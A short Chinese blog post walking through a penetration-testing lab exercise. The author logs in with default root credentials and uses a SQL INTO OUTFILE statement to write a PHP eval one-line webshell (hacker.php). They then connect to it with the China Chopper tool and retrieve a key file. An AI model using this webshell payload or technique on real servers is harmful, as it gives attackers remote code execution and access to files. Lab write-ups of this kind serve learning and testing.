2021年1月26日,第六次渗透测试。
实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干!
准备需求:
1、win10系统;
2、中国菜刀;
1、进入靶场
账号:root 密码:root
这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟);
2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行;
select ‘<?php eval($_POST[key]); ?>’ into outfile ‘/var/www/html/hacker.php’;
执行后的页面显示;
3、打开中国菜刀软件添加新的地址,下面的格式选择UTF-8,完成编辑后,进入后台;
注:地址栏不要照抄,因为每次开启靶场产生的端口号都不一样,所以按照自己的实际进行填写;
这是进入后的画面,可以查看到所有的配置文件;
还能查看到我们刚刚在sql控制台上传的后台文件,文件名:hacker.php,点击进去后看到我们输入的内容;
2 、3点结合分析:
- 在sql命令行命令中输入的[ ]中的内容为webshell密码,与菜刀上地址栏后面的输入框对应;
- 地址栏的后缀对应sql命令中html后面的文件名;
4、到根目录下,找到key.txt文件打开就可以看到钥匙了。
中国菜刀介绍:
从百度可以看到菜刀本来是一个网站的管理工具,但或许过于强大,后来变成了黑客的攻击工具,现在按功能说的话名字是“远程webshell工具”,网友们称为“中国菜刀”。
具体用法网上挺多的,而且操作也不难,我就不再多说。